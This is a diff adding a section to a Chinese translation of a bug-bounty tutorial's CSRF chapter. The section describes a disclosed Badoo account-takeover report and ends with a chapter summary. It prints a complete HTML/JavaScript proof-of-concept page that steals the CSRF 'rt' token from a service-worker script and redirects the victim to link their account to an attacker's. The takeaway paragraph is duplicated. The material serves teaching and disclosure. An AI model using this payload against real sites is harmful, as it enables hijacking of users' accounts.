--- a/Web_Hacking_101/八、跨站請求偽造.md
+++ b/Web_Hacking_101/八、跨站請求偽造.md
@@ -117,3 +117,62 @@ Connection: keep-alive
 >
 >這種情況下，這個漏洞可以使用代理服務器來發現，例如 Burp 或者 Firefox 的 Tamper Data，來觀察發送給 Shopify 
 >的請求，並主要到這個請求使用 GET 方式來執行。由於這是個破壞性操作，而 GET 請求不應該修改任何服務器上的數據，這應該是一些需要關注的事情。
+
+---
+
+## **3. Badoo 賬戶的完整控制**
+
+```
+難度：中
+
+URL：https://badoo.com
+報告鏈接：https://hackerone.com/reports/127703
+報告日期：2016.4.1
+獎金：$852
+描述：
+```
+如果你仔細檢查 Badoo ，你會發現，它們通過包含 URL 參數`rt`來防禦 CSRF，它只有 5 個位數（至少在我寫這篇的時候）。雖然我在 Badoo 入駐 HackerOne 的時候就注意到了，我並沒有找到利用它的方式，但是`zombiehelp54`找到了。
+<p>
+發現`rt`參數以及其值之後，它也注意到了，參數一戶在所有 JSON 響應中都返回。不幸的是，這並沒有什麼幫助，因為 CORS 保護了 Badoo，攻擊者無法讀取這些響應，所以它繼續挖掘。
+<p>
+
+最終，文件`https://eu1.badoo.com/worker-scope/chrome-service-worker.js`包含了`rt`值。更好的是，這個文件可以由攻擊者任意讀取，而不需要受害者做什麼，除了瀏覽這個惡意頁面。這裡是它提供的代碼。
+
+```html
+<html>
+<head>
+<title>Badoo account take over</title>
+<script src=https://eu1.badoo.com/worker-scope/chrome-service-worker.js?ws=1></s\ cript>
+</head>
+<body>
+<script>
+function getCSRFcode(str) {
+    return str.split('=')[2];
+}
+    window.onload = function(){
+    var csrf_code = getCSRFcode(url_stats);
+    csrf_url = 'https://eu1.badoo.com/google/verify.phtml?code=4/nprfspM3yfn2SFUBear08KQaXo609JkArgoju1gZ6Pc&authuser=3&session_state=7cb85df679219ce71044666c7be3e037ff54b560..a810&prompt=none&rt='+ csrf_code;
+    window.location = csrf_url;
+};
+</script>
+```
+本質上，當受害者加載此頁面時，它會調用Badoo 的腳本，為用戶獲取rt參數，之後代表受害者進行調用，這裡，它將受害者的賬戶鏈接到了攻擊者的，本上上完成了賬戶的控制。
+
+>重要結論
+>
+>無風不起浪。這裡，攻擊者註意到了rt參數在不同位置返回，特別是 JSON 響應，
+>因此，它正確猜測了，它可能出現在一些可以利用的地方，這裡是 JS 文件。
+>繼續幹吧，如果你覺得一些東西可能會發生，一定要繼續挖掘。當你訪問目標站點或應用時，使用 Burp 檢查所有被調用的資源。重要結論
+>
+>無風不起浪。這裡，攻擊者註意到了rt參數在不同位置返回，特別是 JSON 響應，因此，它正確猜測了，
+>它可能出現在一些可以利用的地方，這裡是 JS 文件。
+>繼續幹吧，如果你覺得一些東西可能會發生，一定要繼續挖掘。當你訪問目標站點或應用時，使用 Burp 檢查所有被調用的資源。
+
+## **總結**
+
+<p>
+
+CSRF 表示另一個攻擊向量，並且可能在受害者不知道，或者不主動執行操作的情況下發生。 CSRF 漏洞的發現可能需要一些機智，同樣，也需要測試任何東西的渴望。
+<p>
+	
+通常，如果站點執行 POST 請求，Web 表單都統一由應用框架保護，例如 Rails，但是 API 又是另外一個事情。例如， Shopify 使用了 RoR 編寫，它對所有表單默認提供了 CSRF 保護（當然也可以關掉）。但是，顯而易見，這對於使用框架創建的 API 不一定成立。最後，一定要觀察任何通過 GET 請求執行的，修改服務器數據的調用（例如刪除操作）。
